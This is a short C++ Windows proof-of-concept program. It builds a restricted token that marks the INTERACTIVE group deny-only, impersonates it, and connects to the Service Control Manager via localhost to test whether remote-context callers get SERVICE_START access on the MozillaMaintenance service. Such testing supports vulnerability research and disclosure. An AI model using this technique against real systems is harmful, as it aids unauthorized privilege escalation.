#include <stdio.h>
#include <windows.h>
#include <sddl.h>

int wmain(int argc, wchar_t** argv)
{
    SID_AND_ATTRIBUTES sids[1] = {};

    // Remove INTERACTIVE group from caller's token.
    if (!ConvertStringSidToSid(L"S-1-5-4", &sids[0].Sid))
    {
        printf("[ERROR]: Failed to convert SID:%d\n", GetLastError());
        return 0;
    }

    HANDLE primary_token;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &primary_token))
    {
        printf("[ERROR]: Failed to open token:%d\n", GetLastError());
        return 0;
    }

    HANDLE restricted_token;
    if (!CreateRestrictedToken(primary_token, 0, 1, sids, 0, nullptr, 0, nullptr, &restricted_token))
    {
        printf("[ERROR]: Failed to create restricted token:%d\n", GetLastError());
        return 0;
    }

    if (!ImpersonateLoggedOnUser(restricted_token))
    {
        printf("[ERROR]: Failed to impersonate restricted token:%d\n", GetLastError());
        return 0;
    }

    auto scm = OpenSCManager(L"127.0.0.1", nullptr, SC_MANAGER_CONNECT);
    if (scm == nullptr)
    {
        printf("[ERROR]: Failed to open SCM error:%d\n", GetLastError());
        return 0;
    }

    auto service = OpenService(scm, L"MozillaMaintenance", SERVICE_START);
    if (!service)
    {
        printf("[ERROR]: Wasn't able to get SERVICE_START access:%d\n", GetLastError());
        return 0;
    }

    printf("[SUCCESS]: Was granted SERVICE_START access from a remote context.");

    return 0;
}
